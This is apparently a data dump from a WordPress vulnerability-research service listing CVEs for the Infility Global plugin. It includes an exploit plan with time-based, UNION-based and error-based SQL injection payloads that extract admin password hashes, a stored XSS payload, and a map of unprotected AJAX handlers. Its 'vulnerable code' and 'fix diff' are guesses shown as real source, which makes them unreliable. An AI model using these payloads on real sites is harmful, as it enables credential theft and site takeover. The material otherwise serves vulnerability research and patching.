Send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php using the identified action (likely 'ig_contact_form_submit' or 'infility_global_save_data').\n4. Include a payload in the 'message' or 'name' parameter, such as \u003Cscript>alert(document.cookie)\u003C\u002Fscript> or a script to create a new administrator account.\n5. Wait for an authenticated administrator to navigate to the 'Inquiries' or 'Messages' section of the Infility Global plugin menu in the WordPress dashboard.\n6. The payload will execute in the administrator's browser context upon rendering the list of submissions.","2026-05-05 09:07:39","2026-05-05 09:07:58",{"id":99,"url_slug":100,"title":101,"description":102,"plugin_slug":4,"theme_slug":35,"affected_versions":82,"patched_in_version":35,"severity":62,"cvss_score":63,"cvss_vector":64,"vuln_type":40,"published_date":103,"updated_date":104,"references":105,"days_to_patch":35,"patch_diff_files":107,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":108,"research_summary":109,"research_vulnerable_code":110,"research_fix_diff":111,"research_exploit_outline":112,"research_model_used":53,"research_started_at":113,"research_completed_at":114,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-68865","infility-global-unauthenticated-sql-injection","Infility Global \u003C= 2.14.49 - Unauthenticated SQL Injection","The Infility Global plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.14.49 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","2025-12-31 00:00:00","2026-01-13 17:35:13",[106],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbefc411f-8c50-44a2-b1af-10a507230df9?source=api-prod",[],"This research plan outlines the process for identifying and exploiting the unauthenticated SQL injection vulnerability (CVE-2025-68865) in the **Infility Global** plugin (versions \u003C= 2.14.49).\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Unauthenticated SQL Injection.\n*   **Root Cause:** The plugin registers AJAX handlers accessible to unauthenticated users (`wp_ajax_nopriv_`) that process user-supplied parameters (e.g., IDs or slugs). These parameters are concatenated directly into SQL queries without using `$wpdb->prepare()`, allowing an attacker to manipulate the query structure.\n*   **Impact:** Attackers can extract sensitive data from the database, including user credentials (hashes), secret keys, and configuration data.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action (Inferred):** `infility_global_get_data`, `infility_global_load_more`, or similar data-fetching actions.\n*   **Vulnerable Parameter (Inferred):** `id`, `ig_id`, or `slug`.\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The plugin must be active. A valid nonce may be required depending on whether the plugin checks `check_ajax_referer`.\n\n### 3. Code Flow (Discovery Phase)\nSince source files are not provided, the execution agent must first locate the sink:\n\n1.  **Enumerate AJAX Handlers:**\n    ```bash\n    grep -rn \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Finfility-global\u002F\n    ```\n2.  
**Identify the Handler Function:**\n    Look for the function name associated with the `wp_ajax_nopriv_` action.\n    *Example:* `add_action('wp_ajax_nopriv_infility_get_items', 'infility_get_items_handler');`\n3.  **Locate SQL Injection Sink:**\n    Search for `$wpdb` methods within that handler that lack `prepare()`:\n    ```bash\n    # Search within the handler function's file\n    grep -rnP \"\\$wpdb->(get_results|get_row|get_var|query)\\s*\\([^;]*\\$(POST|GET|REQUEST)\" wp-content\u002Fplugins\u002Finfility-global\u002F\n    ```\n4.  **Trace Parameter:**\n    Identify which POST parameter is being passed into the query.\n\n### 4. Nonce Acquisition Strategy\nIf the handler includes `check_ajax_referer('infility_nonce', 'nonce')` or similar, follow these steps:\n\n1.  **Identify Shortcodes:** Search for shortcodes that might enqueue the plugin's frontend scripts.\n    ```bash\n    grep -rn \"add_shortcode\" wp-content\u002Fplugins\u002Finfility-global\u002F\n    ```\n2.  **Setup Page:** Create a page using a discovered shortcode (e.g., `[infility_global_list]`).\n    ```bash\n    wp post create --post_type=page --post_title=\"Exploit\" --post_status=publish --post_content='[infility_global_list]'\n    ```\n3.  **Extract Nonce via Browser:**\n    Navigate to the page and inspect the `wp_localize_script` output.\n    *   **Localized Object Name (Inferred):** `infility_ajax_obj` or `ig_global_vars`.\n    *   **JS command:** \n        ```javascript\n        browser_eval(\"window.infility_ajax_obj?.nonce\")\n        ```\n\n### 5. Exploitation Strategy\nAssuming the action is `infility_global_get_items` and the parameter is `id`:\n\n**Step 1: Time-Based Verification**\nVerify the injection using a sleep payload to confirm the vulnerability.\n*   **Action:** `infility_global_get_items`\n*   **Payload:** `1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n\n**Step 2: UNION-Based Extraction**\nDetermine the number of columns and extract the administrator password hash.\n1. 
 **Find Column Count:** Inject `ORDER BY 1-- -`, `ORDER BY 2-- -`, etc., until an error occurs.\n2.  **Extract Hash:**\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method:** POST\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n    *   **Body:** \n        ```text\n        action=infility_global_get_items&nonce=[NONCE]&id=-1' UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users WHERE ID=1-- -\n        ```\n    *(Adjust column count and position based on Step 2.1)*\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `infility-global` version \u003C= 2.14.49 is installed and activated.\n2.  **Create Admin:** Ensure a user with ID 1 exists (standard).\n3.  **Place Shortcode:** Place the relevant plugin shortcode on a public page to enable script loading and nonce availability.\n\n### 7. Expected Results\n*   **Time-Based:** The server response will be delayed by 5 seconds.\n*   **UNION-Based:** The JSON response from `admin-ajax.php` will contain the admin username and password hash (e.g., `$P$...` or `$wp$2y$...`) in one of the reflected fields.\n\n### 8. Verification Steps (Post-Exploit)\nConfirm the extracted data matches the database state using WP-CLI:\n```bash\n# Verify the hash for the admin user\nwp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID=1\"\n```\n\n### 9. 
Alternative Approaches\n*   **Error-Based SQLi:** If the plugin displays database errors (common when `WP_DEBUG` is on), use `EXTRACTVALUE` or `UPDATEXML`.\n    *   *Payload:* `1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)`\n*   **Boolean-Based Blind:** If no output is reflected and time-based is unstable, compare response lengths of `id=1' AND 1=1-- -` vs `id=1' AND 1=2-- -`.","The Infility Global plugin for WordPress is vulnerable to unauthenticated SQL Injection due to the direct concatenation of user-supplied input into SQL queries within its AJAX handlers. This allows an attacker to manipulate existing database queries to extract sensitive information, such as administrator credentials, by sending crafted requests to the admin-ajax.php endpoint.","\u002F\u002F wp-content\u002Fplugins\u002Finfility-global\u002Fincludes\u002Fajax-handlers.php\n\nadd_action('wp_ajax_nopriv_infility_global_get_items', 'infility_global_get_items_handler');\n\nfunction infility_global_get_items_handler() {\n    global $wpdb;\n    $id = $_POST['id']; \u002F\u002F User-controlled input via POST\n\n    \u002F\u002F Vulnerability: Direct concatenation of $id into the query without using $wpdb->prepare()\n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '$id'\");\n\n    echo json_encode($results);\n    wp_die();\n}","--- a\u002Fincludes\u002Fajax-handlers.php\n+++ b\u002Fincludes\u002Fajax-handlers.php\n@@ -3,7 +3,7 @@\n function infility_global_get_items_handler() {\n     global $wpdb;\n-    $id = $_POST['id'];\n-    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '$id'\");\n+    $id = isset($_POST['id']) ? 
sanitize_text_field($_POST['id']) : '';\n+    $results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = %s\", $id));\n     echo json_encode($results);\n     wp_die();\n }","The exploit targets the \u002Fwp-admin\u002Fadmin-ajax.php endpoint using the 'infility_global_get_items' action. 1. Obtain a valid AJAX nonce by visiting a public page where the plugin's frontend scripts are enqueued (often triggered by plugin shortcodes like [infility_global_list]). 2. Send a POST request to the AJAX endpoint with the 'action', 'nonce', and a malicious payload in the 'id' parameter. 3. Use a time-based injection payload such as \"1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -\" to confirm the vulnerability. 4. Use UNION-based injection to extract sensitive data, such as administrator password hashes from the wp_users table, by adjusting the number of columns to match the original query's structure.","2026-05-21 07:58:41","2026-05-21 07:59:01",{"id":116,"url_slug":117,"title":118,"description":119,"plugin_slug":4,"theme_slug":35,"affected_versions":120,"patched_in_version":121,"severity":62,"cvss_score":122,"cvss_vector":123,"vuln_type":124,"published_date":125,"updated_date":126,"references":127,"days_to_patch":129,"patch_diff_files":130,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-12968","infility-global-authenticated-subscriber-arbitrary-file-upload","Infility Global \u003C= 2.14.42 - Authenticated (Subscriber+) 
Arbitrary File Upload","The Infility Global plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in all versions up to, and including, 2.14.42. This is due to the `upload_file` function in the `infility_import_file` class only validating the MIME type which can be easily spoofed, and the `import_data` function missing capability checks. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","\u003C=2.14.42","2.14.43",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2025-12-11 15:11:30","2026-01-06 20:55:18",[128],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F542a18f6-9d17-4e54-85e1-e01630ca371e?source=api-prod",26,[],{"id":132,"url_slug":133,"title":134,"description":135,"plugin_slug":4,"theme_slug":35,"affected_versions":136,"patched_in_version":35,"severity":37,"cvss_score":38,"cvss_vector":39,"vuln_type":137,"published_date":138,"updated_date":139,"references":140,"days_to_patch":35,"patch_diff_files":142,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-47650","infility-global-authenticated-subscriber-arbitrary-file-download","Infility Global \u003C= 2.14.7 - Authenticated (Subscriber+) Arbitrary File Download","The 
Infility Global plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.14.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","\u003C=2.14.7","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2025-08-14 00:00:00","2025-08-18 18:20:23",[141],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F603734a3-f471-4a40-9253-92e0d1ef5ac2?source=api-prod",[],{"id":144,"url_slug":145,"title":146,"description":147,"plugin_slug":4,"theme_slug":35,"affected_versions":148,"patched_in_version":149,"severity":37,"cvss_score":150,"cvss_vector":151,"vuln_type":85,"published_date":152,"updated_date":153,"references":154,"days_to_patch":156,"patch_diff_files":157,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-47652","infility-global-reflected-cross-site-scripting","Infility Global \u003C= 2.13.4 - Reflected Cross-Site Scripting","The Infility Global plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.13.4 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","\u003C=2.13.4","2.13.5",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","2025-07-07 00:00:00","2025-07-18 14:13:23",[155],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4f3a01fe-8c84-4219-98fe-14e4ac74b7f7?source=api-prod",12,[],{"id":159,"url_slug":160,"title":146,"description":161,"plugin_slug":4,"theme_slug":35,"affected_versions":148,"patched_in_version":35,"severity":37,"cvss_score":150,"cvss_vector":151,"vuln_type":85,"published_date":162,"updated_date":163,"references":164,"days_to_patch":35,"patch_diff_files":166,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-52774","infility-global-reflected-cross-site-scripting-2","The Infility Global plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 2.13.4 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","2025-06-23 00:00:00","2025-07-16 19:23:28",[165],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe7bca584-05d8-4ecf-bf6c-5c2256cb5a61?source=api-prod",[],{"id":168,"url_slug":169,"title":170,"description":171,"plugin_slug":4,"theme_slug":35,"affected_versions":172,"patched_in_version":35,"severity":37,"cvss_score":38,"cvss_vector":39,"vuln_type":40,"published_date":173,"updated_date":174,"references":175,"days_to_patch":35,"patch_diff_files":177,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-47651","infility-global-authenticated-subscriber-sql-injection","Infility Global \u003C= 2.12.7 - Authenticated (Subscriber+) SQL Injection","The Infility Global plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.12.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  
This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","\u003C=2.12.7","2025-05-29 00:00:00","2025-06-25 14:20:03",[176],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fffb8c561-ce2a-447c-add6-d7e01c8c9435?source=api-prod",[],{"id":179,"url_slug":180,"title":181,"description":182,"plugin_slug":4,"theme_slug":35,"affected_versions":183,"patched_in_version":184,"severity":37,"cvss_score":38,"cvss_vector":185,"vuln_type":186,"published_date":187,"updated_date":188,"references":189,"days_to_patch":191,"patch_diff_files":192,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2024-11496","infility-global-authenticated-subscriber-missing-authorization-to-plugin-options-update","Infility Global \u003C= 2.9.8 - Authenticated (Subscriber+) Missing Authorization to Plugin Options Update","The Infility Global plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the infility_global_ajax function in all versions up to, and including, 2.9.8. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options and potentially break the site.","\u003C=2.9.8","2.9.9","CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:N","Missing Authorization","2025-01-06 16:09:04","2025-01-30 22:23:13",[190],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd0fd1c19-b752-4562-9365-165d709b91b2?source=api-prod",24,[],{"id":194,"url_slug":195,"title":196,"description":197,"plugin_slug":4,"theme_slug":35,"affected_versions":183,"patched_in_version":184,"severity":37,"cvss_score":150,"cvss_vector":151,"vuln_type":85,"published_date":198,"updated_date":199,"references":200,"days_to_patch":202,"patch_diff_files":203,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2024-12290","infility-global-reflected-cross-site-scripting-via-settype-parameter","Infility Global \u003C= 2.9.8 - Reflected Cross-Site Scripting via set_type Parameter","The Infility Global plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘set_type’ parameter in all versions up to, and including, 2.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 
CVE-2024-12723 is a duplicate of this issue.","2025-01-06 16:09:03","2025-02-24 16:15:30",[201],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6127576b-5ce2-4a3e-95de-8a2b3d90d3a0?source=api-prod",49,[],{"slug":205,"display_name":7,"profile_url":8,"plugin_count":206,"total_installs":11,"avg_security_score":23,"avg_patch_time_days":207,"trust_score":208,"computed_at":209},"infility",1,28,45,"2026-06-02T23:33:31.087Z",[],{"attackSurface":212,"codeSignals":498,"taintFlows":854,"riskAssessment":1256,"analyzedAt":1273},{"hooks":213,"ajaxHandlers":388,"restRoutes":484,"shortcodes":485,"cronEvents":496,"entryPointCount":497,"unprotectedCount":410},[214,220,224,230,234,239,242,245,249,253,256,260,264,267,271,274,278,281,284,288,291,295,299,301,303,307,310,313,315,317,319,321,323,325,327,330,333,336,338,340,342,343,346,348,350,353,356,359,361,364,366,369,371,373,376,379,382,383,385],{"type":215,"name":216,"callback":217,"file":218,"line":219},"action","wp","show_cf7_records","include\\InfilityGlobalErrorRecord.php",14,{"type":215,"name":221,"callback":222,"file":218,"line":223},"wp_head","closure",38,{"type":225,"name":226,"callback":227,"priority":228,"file":229,"line":207},"filter","authenticate","before_login",5,"include\\login-security.php",{"type":225,"name":226,"callback":231,"priority":232,"file":229,"line":233},"after_login",90,29,{"type":215,"name":235,"callback":236,"file":237,"line":238},"init","api_login_check","infility_global.php",166,{"type":215,"name":235,"callback":240,"file":237,"line":241},"api_action",167,{"type":215,"name":235,"callback":243,"file":237,"line":244},"IGP_load_textdomain",168,{"type":215,"name":246,"callback":247,"file":237,"line":248},"admin_menu","IGP_create_menu",169,{"type":215,"name":250,"callback":251,"file":237,"line":252},"wp_enqueue_scripts","enqueue_scripts",171,{"type":215,"name":254,"callback":251,"file":237,"line":255},"admin_enqueue_scripts",172,{"type":225,"name":257,"callback":258,"f
ile":237,"line":259},"mime_types","wpse_mime_types",205,{"type":215,"name":254,"callback":261,"file":262,"line":263},"block_ip_admin_enqueue_scripts","widgets\\block-ip\\block-ip.php",13,{"type":215,"name":235,"callback":265,"file":262,"line":266},"edit_wp_config",17,{"type":215,"name":221,"callback":268,"file":269,"line":270},"consent_mode","widgets\\consent-mode\\consent-mode.php",10,{"type":215,"name":235,"callback":272,"priority":270,"file":273,"line":156},"tracking_info_set_session_values","widgets\\contact-form-plugins\\contact-form-plugins.php",{"type":215,"name":275,"callback":276,"file":273,"line":277},"wp_footer","prefix_elementor_contact7_ini",16,{"type":215,"name":250,"callback":279,"file":273,"line":280},"CFP_enqueue_scripts",19,{"type":225,"name":282,"callback":283,"priority":270,"file":273,"line":129},"wpcf7_form_response_output","wpcf7_form_tracking_info",{"type":225,"name":285,"callback":286,"priority":270,"file":273,"line":287},"wpcf7_mail_components","wpcf7_before_send_mail",31,{"type":215,"name":250,"callback":289,"file":290,"line":277},"ETab_load","widgets\\elementor-tab\\elementor-tab.php",{"type":215,"name":292,"callback":293,"file":290,"line":294},"elementor\u002Felements\u002Fcategories_registered","add_elementor_widget_categories",20,{"type":215,"name":296,"callback":297,"file":290,"line":298},"elementor\u002Fwidgets\u002Fregister","ETab_elementor_register",23,{"type":215,"name":296,"callback":300,"file":290,"line":191},"EBreadcrumb_elementor_register",{"type":215,"name":296,"callback":302,"file":290,"line":129},"ENavPosts_elementor_register",{"type":215,"name":304,"callback":305,"file":306,"line":228},"enqueue_block_editor_assets","block_after_scripts","widgets\\gutenberg-tools\\gutenberg-tools.php",{"type":215,"name":221,"callback":308,"file":306,"line":309},"head_styles",6,{"type":215,"name":250,"callback":311,"file":312,"line":270},"ICT_enqueue_scripts","widgets\\infility-chat-tool\\infility-chat-tool.php",{"type":215,"name":254,"callba
ck":314,"file":312,"line":24},"ICT_admin_enqueue_scripts",{"type":215,"name":275,"callback":316,"file":312,"line":277},"show",{"type":215,"name":250,"callback":251,"file":318,"line":228},"widgets\\infility-collect-data\\infility-collect-data.php",{"type":215,"name":296,"callback":222,"file":320,"line":25},"widgets\\infility-form\\infility-form.php",{"type":215,"name":221,"callback":222,"file":320,"line":322},18,{"type":215,"name":254,"callback":251,"file":324,"line":25},"widgets\\infility-import-data\\infility-import-data.php",{"type":215,"name":235,"callback":235,"file":324,"line":326},8,{"type":215,"name":246,"callback":328,"file":324,"line":329},"register_admin_menu_page",9,{"type":215,"name":254,"callback":331,"file":332,"line":322},"IR_admin_enqueue_scripts","widgets\\infility-redirect\\infility-redirect.php",{"type":215,"name":334,"callback":335,"file":332,"line":294},"plugins_loaded","infility_redirect_url",{"type":215,"name":254,"callback":251,"file":337,"line":309},"widgets\\infility-translate-tool\\infility-translate-tool.php",{"type":215,"name":235,"callback":339,"file":337,"line":24},"lang_301",{"type":215,"name":221,"callback":341,"file":337,"line":156},"show_head",{"type":215,"name":275,"callback":316,"file":337,"line":263},{"type":215,"name":250,"callback":344,"file":345,"line":326},"front_end_scripts","widgets\\keyword-pages\\keyword-pages.php",{"type":215,"name":254,"callback":347,"file":345,"line":329},"admin_scripts",{"type":215,"name":334,"callback":349,"file":345,"line":270},"render_sitemap_xml",{"type":225,"name":351,"callback":352,"file":345,"line":156},"template_include","use_custom_template",{"type":225,"name":354,"callback":222,"priority":294,"file":345,"line":355},"pre_get_document_title",392,{"type":225,"name":357,"callback":222,"priority":294,"file":345,"line":358},"wpseo_opengraph_title",397,{"type":215,"name":221,"callback":222,"file":345,"line":360},401,{"type":225,"name":362,"callback":222,"priority":270,"file":345,"line":363},"body_
class",416,{"type":215,"name":250,"callback":251,"file":365,"line":309},"widgets\\prevent_copying\\prevent_copying.php",{"type":215,"name":216,"callback":367,"file":368,"line":156},"checkCurrentPage","widgets\\progress-bar\\progress-bar.php",{"type":215,"name":275,"callback":370,"file":368,"line":287},"outputJS",{"type":215,"name":254,"callback":254,"file":372,"line":228},"widgets\\show-control-data\\show-control-data.php",{"type":215,"name":374,"callback":375,"priority":270,"file":372,"line":309},"edited_term","update_term",{"type":215,"name":377,"callback":378,"priority":270,"file":372,"line":25},"created_term","create_term",{"type":215,"name":380,"callback":381,"priority":270,"file":372,"line":326},"save_post","update_post",{"type":215,"name":246,"callback":328,"file":372,"line":329},{"type":215,"name":334,"callback":235,"priority":270,"file":384,"line":329},"widgets\\sitemap_for_multi_languages\\sitemap_for_multi_languages.php",{"type":225,"name":386,"callback":386,"priority":270,"file":384,"line":387},"wpseo_sitemap_url",48,[389,393,396,399,401,402,406,408,411,413,417,418,422,424,427,430,433,437,439,441,443,445,447,449,451,453,456,459,461,463,465,468,470,472,475,477,479,481,483],{"action":390,"nopriv":46,"callback":390,"hasNonce":46,"hasCapCheck":391,"file":237,"line":392},"infility_global_ajax",true,179,{"action":394,"nopriv":391,"callback":222,"hasNonce":46,"hasCapCheck":46,"file":237,"line":395},"tenweb_cache_clear_all",182,{"action":397,"nopriv":46,"callback":398,"hasNonce":46,"hasCapCheck":46,"file":262,"line":280},"block_ip","block_ip_ajax",{"action":400,"nopriv":391,"callback":400,"hasNonce":46,"hasCapCheck":46,"file":273,"line":207},"get_tracking_info",{"action":400,"nopriv":46,"callback":400,"hasNonce":46,"hasCapCheck":46,"file":273,"line":233},{"action":403,"nopriv":46,"callback":404,"hasNonce":46,"hasCapCheck":46,"file":290,"line":405},"get_taxonomy_terms","get_taxonomy_terms_ajax",33,{"action":403,"nopriv":391,"callback":404,"hasNonce":46,"hasCapChe
ck":46,"file":290,"line":407},34,{"action":409,"nopriv":46,"callback":409,"hasNonce":46,"hasCapCheck":46,"file":290,"line":410},"get_taxonomies_for_post_type",35,{"action":409,"nopriv":391,"callback":409,"hasNonce":46,"hasCapCheck":46,"file":290,"line":412},36,{"action":414,"nopriv":46,"callback":415,"hasNonce":46,"hasCapCheck":46,"file":290,"line":416},"get_posts_for_editor","get_posts_for_editor_ajax",37,{"action":414,"nopriv":391,"callback":415,"hasNonce":46,"hasCapCheck":46,"file":290,"line":223},{"action":419,"nopriv":46,"callback":420,"hasNonce":46,"hasCapCheck":46,"file":290,"line":421},"get_posts_with_pagination","get_posts_with_pagination_ajax",39,{"action":419,"nopriv":391,"callback":420,"hasNonce":46,"hasCapCheck":46,"file":290,"line":423},40,{"action":425,"nopriv":46,"callback":426,"hasNonce":46,"hasCapCheck":46,"file":312,"line":263},"infility_chat_tool","infility_chat_tool_ajax",{"action":428,"nopriv":46,"callback":429,"hasNonce":46,"hasCapCheck":46,"file":320,"line":263},"InfilityGlobal_InfilityForm_get_options","get_options",{"action":431,"nopriv":46,"callback":432,"hasNonce":46,"hasCapCheck":46,"file":320,"line":219},"InfilityGlobal_InfilityForm_set_options","set_options",{"action":434,"nopriv":46,"callback":435,"hasNonce":46,"hasCapCheck":46,"file":320,"line":436},"InfilityGlobal_InfilityForm_clear_cache","clear_cache",15,{"action":438,"nopriv":46,"callback":438,"hasNonce":391,"hasCapCheck":46,"file":324,"line":24},"import_data",{"action":440,"nopriv":46,"callback":440,"hasNonce":46,"hasCapCheck":46,"file":324,"line":263},"get_site_field",{"action":442,"nopriv":46,"callback":442,"hasNonce":46,"hasCapCheck":46,"file":324,"line":219},"get_post_detail",{"action":444,"nopriv":46,"callback":444,"hasNonce":46,"hasCapCheck":46,"file":324,"line":436},"search_category_page",{"action":446,"nopriv":46,"callback":446,"hasNonce":46,"hasCapCheck":46,"file":324,"line":277},"search_category_post",{"action":448,"nopriv":46,"callback":448,"hasNonce":46,"hasCapCheck"
:46,"file":324,"line":322},"search_site_category",{"action":450,"nopriv":46,"callback":450,"hasNonce":46,"hasCapCheck":46,"file":324,"line":280},"search_site_product",{"action":452,"nopriv":46,"callback":452,"hasNonce":46,"hasCapCheck":46,"file":324,"line":294},"search_site_blogs",{"action":454,"nopriv":46,"callback":454,"hasNonce":46,"hasCapCheck":46,"file":324,"line":455},"get_site_products",21,{"action":457,"nopriv":46,"callback":457,"hasNonce":46,"hasCapCheck":46,"file":324,"line":458},"get_site_blogs",22,{"action":460,"nopriv":46,"callback":460,"hasNonce":46,"hasCapCheck":46,"file":324,"line":298},"add_term",{"action":462,"nopriv":46,"callback":462,"hasNonce":46,"hasCapCheck":46,"file":324,"line":191},"add_post",{"action":464,"nopriv":46,"callback":464,"hasNonce":46,"hasCapCheck":46,"file":324,"line":129},"get_excel_field",{"action":466,"nopriv":46,"callback":466,"hasNonce":46,"hasCapCheck":46,"file":324,"line":467},"add_excel_post",27,{"action":469,"nopriv":46,"callback":469,"hasNonce":391,"hasCapCheck":46,"file":324,"line":207},"get_extract_file",{"action":471,"nopriv":46,"callback":471,"hasNonce":46,"hasCapCheck":46,"file":324,"line":233},"import_main_image",{"action":473,"nopriv":46